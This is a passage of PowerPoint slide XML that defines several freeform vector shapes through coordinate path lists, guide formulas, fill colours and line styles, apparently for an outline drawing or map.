                      <a:pt x="150" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="621"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36415" name="Freeform 147"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1649" y="3929"/>
                <a:ext cx="6" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 6"/>
                  <a:gd name="T1" fmla="*/ 14 h 14"/>
                  <a:gd name="T2" fmla="*/ 0 w 6"/>
                  <a:gd name="T3" fmla="*/ 0 h 14"/>
                  <a:gd name="T4" fmla="*/ 6 w 6"/>
                  <a:gd name="T5" fmla="*/ 3 h 14"/>
                  <a:gd name="T6" fmla="*/ 6 w 6"/>
                  <a:gd name="T7" fmla="*/ 6 h 14"/>
                  <a:gd name="T8" fmla="*/ 4 w 6"/>
                  <a:gd name="T9" fmla="*/ 10 h 14"/>
                  <a:gd name="T10" fmla="*/ 0 w 6"/>
                  <a:gd name="T11" fmla="*/ 14 h 14"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T18" fmla="*/ 0 w 6"/>
                  <a:gd name="T19" fmla="*/ 0 h 14"/>
                  <a:gd name="T20" fmla="*/ 6 w 6"/>
                  <a:gd name="T21" fmla="*/ 14 h 14"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T12">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T15">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T16">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="T17">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T18" t="T19" r="T20" b="T21"/>
                <a:pathLst>
                  <a:path w="6" h="14">
                    <a:moveTo>
                      <a:pt x="0" y="14"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36416" name="Freeform 148"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1648" y="3943"/>
                <a:ext cx="55" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 55"/>
                  <a:gd name="T1" fmla="*/ 0 h 49"/>
                  <a:gd name="T2" fmla="*/ 2 w 55"/>
                  <a:gd name="T3" fmla="*/ 2 h 49"/>
                  <a:gd name="T4" fmla="*/ 3 w 55"/>
                  <a:gd name="T5" fmla="*/ 3 h 49"/>
                  <a:gd name="T6" fmla="*/ 8 w 55"/>
                  <a:gd name="T7" fmla="*/ 2 h 49"/>
                  <a:gd name="T8" fmla="*/ 10 w 55"/>
                  <a:gd name="T9" fmla="*/ 3 h 49"/>
                  <a:gd name="T10" fmla="*/ 15 w 55"/>
                  <a:gd name="T11" fmla="*/ 12 h 49"/>
                  <a:gd name="T12" fmla="*/ 21 w 55"/>
                  <a:gd name="T13" fmla="*/ 20 h 49"/>
                  <a:gd name="T14" fmla="*/ 28 w 55"/>
                  <a:gd name="T15" fmla="*/ 29 h 49"/>
                  <a:gd name="T16" fmla="*/ 32 w 55"/>
                  <a:gd name="T17" fmla="*/ 32 h 49"/>
                  <a:gd name="T18" fmla="*/ 37 w 55"/>
                  <a:gd name="T19" fmla="*/ 37 h 49"/>
                  <a:gd name="T20" fmla="*/ 39 w 55"/>
                  <a:gd name="T21" fmla="*/ 37 h 49"/>
                  <a:gd name="T22" fmla="*/ 42 w 55"/>
                  <a:gd name="T23" fmla="*/ 37 h 49"/>
                  <a:gd name="T24" fmla="*/ 45 w 55"/>
                  <a:gd name="T25" fmla="*/ 39 h 49"/>
                  <a:gd name="T26" fmla="*/ 54 w 55"/>
                  <a:gd name="T27" fmla="*/ 40 h 49"/>
                  <a:gd name="T28" fmla="*/ 55 w 55"/>
                  <a:gd name="T29" fmla="*/ 40 h 49"/>
                  <a:gd name="T30" fmla="*/ 55 w 55"/>
                  <a:gd name="T31" fmla="*/ 42 h 49"/>
                  <a:gd name="T32" fmla="*/ 54 w 55"/>
                  <a:gd name="T33" fmla="*/ 45 h 49"/>
                  <a:gd name="T34" fmla="*/ 51 w 55"/>
                  <a:gd name="T35" fmla="*/ 46 h 49"/>
                  <a:gd name="T36" fmla="*/ 42 w 55"/>
                  <a:gd name="T37" fmla="*/ 47 h 49"/>
                  <a:gd name="T38" fmla="*/ 36 w 55"/>
                  <a:gd name="T39" fmla="*/ 49 h 49"/>
                  <a:gd name="T40" fmla="*/ 34 w 55"/>
                  <a:gd name="T41" fmla="*/ 49 h 49"/>
                  <a:gd name="T42" fmla="*/ 25 w 55"/>
                  <a:gd name="T43" fmla="*/ 45 h 49"/>
                  <a:gd name="T44" fmla="*/ 20 w 55"/>
                  <a:gd name="T45" fmla="*/ 44 h 49"/>
                  <a:gd name="T46" fmla="*/ 12 w 55"/>
                  <a:gd name="T47" fmla="*/ 43 h 49"/>
                  <a:gd name="T48" fmla="*/ 6 w 55"/>
                  <a:gd name="T49" fmla="*/ 43 h 49"/>
                  <a:gd name="T50" fmla="*/ 0 w 55"/>
                  <a:gd name="T51" fmla="*/ 44 h 49"/>
                  <a:gd name="T52" fmla="*/ 1 w 55"/>
                  <a:gd name="T53" fmla="*/ 0 h 49"/>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55"/>
                  <a:gd name="T82" fmla="*/ 0 h 49"/>
                  <a:gd name="T83" fmla="*/ 55 w 55"/>
                  <a:gd name="T84" fmla="*/ 49 h 49"/>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55" h="49">
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36417" name="Freeform 149"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1572" y="3300"/>
                <a:ext cx="316" cy="621"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 316"/>
                  <a:gd name="T1" fmla="*/ 613 h 621"/>
                  <a:gd name="T2" fmla="*/ 19 w 316"/>
                  <a:gd name="T3" fmla="*/ 577 h 621"/>
                  <a:gd name="T4" fmla="*/ 0 w 316"/>
                  <a:gd name="T5" fmla="*/ 554 h 621"/>
                  <a:gd name="T6" fmla="*/ 20 w 316"/>
                  <a:gd name="T7" fmla="*/ 519 h 621"/>
                  <a:gd name="T8" fmla="*/ 25 w 316"/>
                  <a:gd name="T9" fmla="*/ 498 h 621"/>
                  <a:gd name="T10" fmla="*/ 29 w 316"/>
                  <a:gd name="T11" fmla="*/ 459 h 621"/>
                  <a:gd name="T12" fmla="*/ 25 w 316"/>
                  <a:gd name="T13" fmla="*/ 440 h 621"/>
                  <a:gd name="T14" fmla="*/ 40 w 316"/>
                  <a:gd name="T15" fmla="*/ 433 h 621"/>
                  <a:gd name="T16" fmla="*/ 29 w 316"/>
                  <a:gd name="T17" fmla="*/ 409 h 621"/>
                  <a:gd name="T18" fmla="*/ 24 w 316"/>
                  <a:gd name="T19" fmla="*/ 386 h 621"/>
                  <a:gd name="T20" fmla="*/ 27 w 316"/>
                  <a:gd name="T21" fmla="*/ 351 h 621"/>
                  <a:gd name="T22" fmla="*/ 35 w 316"/>
                  <a:gd name="T23" fmla="*/ 316 h 621"/>
                  <a:gd name="T24" fmla="*/ 38 w 316"/>
                  <a:gd name="T25" fmla="*/ 281 h 621"/>
                  <a:gd name="T26" fmla="*/ 49 w 316"/>
                  <a:gd name="T27" fmla="*/ 246 h 621"/>
                  <a:gd name="T28" fmla="*/ 59 w 316"/>
                  <a:gd name="T29" fmla="*/ 212 h 621"/>
                  <a:gd name="T30" fmla="*/ 52 w 316"/>
                  <a:gd name="T31" fmla="*/ 155 h 621"/>
                  <a:gd name="T32" fmla="*/ 57 w 316"/>
                  <a:gd name="T33" fmla="*/ 130 h 621"/>
                  <a:gd name="T34" fmla="*/ 75 w 316"/>
                  <a:gd name="T35" fmla="*/ 93 h 621"/>
                  <a:gd name="T36" fmla="*/ 80 w 316"/>
                  <a:gd name="T37" fmla="*/ 84 h 621"/>
                  <a:gd name="T38" fmla="*/ 80 w 316"/>
                  <a:gd name="T39" fmla="*/ 68 h 621"/>
                  <a:gd name="T40" fmla="*/ 82 w 316"/>
                  <a:gd name="T41" fmla="*/ 46 h 621"/>
                  <a:gd name="T42" fmla="*/ 104 w 316"/>
                  <a:gd name="T43" fmla="*/ 20 h 621"/>
                  <a:gd name="T44" fmla="*/ 117 w 316"/>
                  <a:gd name="T45" fmla="*/ 0 h 621"/>
                  <a:gd name="T46" fmla="*/ 136 w 316"/>
                  <a:gd name="T47" fmla="*/ 3 h 621"/>
                  <a:gd name="T48" fmla="*/ 155 w 316"/>
                  <a:gd name="T49" fmla="*/ 2 h 621"/>
                  <a:gd name="T50" fmla="*/ 177 w 316"/>
                  <a:gd name="T51" fmla="*/ 7 h 621"/>
                  <a:gd name="T52" fmla="*/ 205 w 316"/>
                  <a:gd name="T53" fmla="*/ 35 h 621"/>
                  <a:gd name="T54" fmla="*/ 245 w 316"/>
                  <a:gd name="T55" fmla="*/ 55 h 621"/>
                  <a:gd name="T56" fmla="*/ 242 w 316"/>
                  <a:gd name="T57" fmla="*/ 79 h 621"/>
                  <a:gd name="T58" fmla="*/ 236 w 316"/>
                  <a:gd name="T59" fmla="*/ 94 h 621"/>
                  <a:gd name="T60" fmla="*/ 261 w 316"/>
                  <a:gd name="T61" fmla="*/ 95 h 621"/>
                  <a:gd name="T62" fmla="*/ 278 w 316"/>
                  <a:gd name="T63" fmla="*/ 93 h 621"/>
                  <a:gd name="T64" fmla="*/ 297 w 316"/>
                  <a:gd name="T65" fmla="*/ 80 h 621"/>
                  <a:gd name="T66" fmla="*/ 312 w 316"/>
                  <a:gd name="T67" fmla="*/ 66 h 621"/>
                  <a:gd name="T68" fmla="*/ 298 w 316"/>
                  <a:gd name="T69" fmla="*/ 100 h 621"/>
                  <a:gd name="T70" fmla="*/ 255 w 316"/>
                  <a:gd name="T71" fmla="*/ 147 h 621"/>
                  <a:gd name="T72" fmla="*/ 245 w 316"/>
                  <a:gd name="T73" fmla="*/ 181 h 621"/>
                  <a:gd name="T74" fmla="*/ 240 w 316"/>
                  <a:gd name="T75" fmla="*/ 208 h 621"/>
                  <a:gd name="T76" fmla="*/ 238 w 316"/>
                  <a:gd name="T77" fmla="*/ 226 h 621"/>
                  <a:gd name="T78" fmla="*/ 257 w 316"/>
                  <a:gd name="T79" fmla="*/ 241 h 621"/>
                  <a:gd name="T80" fmla="*/ 257 w 316"/>
                  <a:gd name="T81" fmla="*/ 258 h 621"/>
                  <a:gd name="T82" fmla="*/ 267 w 316"/>
                  <a:gd name="T83" fmla="*/ 274 h 621"/>
                  <a:gd name="T84" fmla="*/ 250 w 316"/>
                  <a:gd name="T85" fmla="*/ 303 h 621"/>
                  <a:gd name="T86" fmla="*/ 200 w 316"/>
                  <a:gd name="T87" fmla="*/ 315 h 621"/>
                  <a:gd name="T88" fmla="*/ 178 w 316"/>
                  <a:gd name="T89" fmla="*/ 322 h 621"/>
                  <a:gd name="T90" fmla="*/ 177 w 316"/>
                  <a:gd name="T91" fmla="*/ 340 h 621"/>
                  <a:gd name="T92" fmla="*/ 177 w 316"/>
                  <a:gd name="T93" fmla="*/ 355 h 621"/>
                  <a:gd name="T94" fmla="*/ 137 w 316"/>
                  <a:gd name="T95" fmla="*/ 353 h 621"/>
                  <a:gd name="T96" fmla="*/ 137 w 316"/>
                  <a:gd name="T97" fmla="*/ 372 h 621"/>
                  <a:gd name="T98" fmla="*/ 150 w 316"/>
                  <a:gd name="T99" fmla="*/ 386 h 621"/>
                  <a:gd name="T100" fmla="*/ 158 w 316"/>
                  <a:gd name="T101" fmla="*/ 393 h 621"/>
                  <a:gd name="T102" fmla="*/ 149 w 316"/>
                  <a:gd name="T103" fmla="*/ 392 h 621"/>
                  <a:gd name="T104" fmla="*/ 135 w 316"/>
                  <a:gd name="T105" fmla="*/ 397 h 621"/>
                  <a:gd name="T106" fmla="*/ 140 w 316"/>
                  <a:gd name="T107" fmla="*/ 403 h 621"/>
                  <a:gd name="T108" fmla="*/ 131 w 316"/>
                  <a:gd name="T109" fmla="*/ 426 h 621"/>
                  <a:gd name="T110" fmla="*/ 117 w 316"/>
                  <a:gd name="T111" fmla="*/ 442 h 621"/>
                  <a:gd name="T112" fmla="*/ 96 w 316"/>
                  <a:gd name="T113" fmla="*/ 464 h 621"/>
                  <a:gd name="T114" fmla="*/ 109 w 316"/>
                  <a:gd name="T115" fmla="*/ 489 h 621"/>
                  <a:gd name="T116" fmla="*/ 123 w 316"/>
                  <a:gd name="T117" fmla="*/ 505 h 621"/>
                  <a:gd name="T118" fmla="*/ 100 w 316"/>
                  <a:gd name="T119" fmla="*/ 530 h 621"/>
                  <a:gd name="T120" fmla="*/ 92 w 316"/>
                  <a:gd name="T121" fmla="*/ 556 h 621"/>
                  <a:gd name="T122" fmla="*/ 72 w 316"/>
                  <a:gd name="T123" fmla="*/ 574 h 621"/>
                  <a:gd name="T124" fmla="*/ 80 w 316"/>
                  <a:gd name="T125" fmla="*/ 617 h 62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316"/>
                  <a:gd name="T190" fmla="*/ 0 h 621"/>
                  <a:gd name="T191" fmla="*/ 316 w 316"/>
                  <a:gd name="T192" fmla="*/ 621 h 621"/>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316" h="621">
                    <a:moveTo>
                      <a:pt x="81" y="621"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
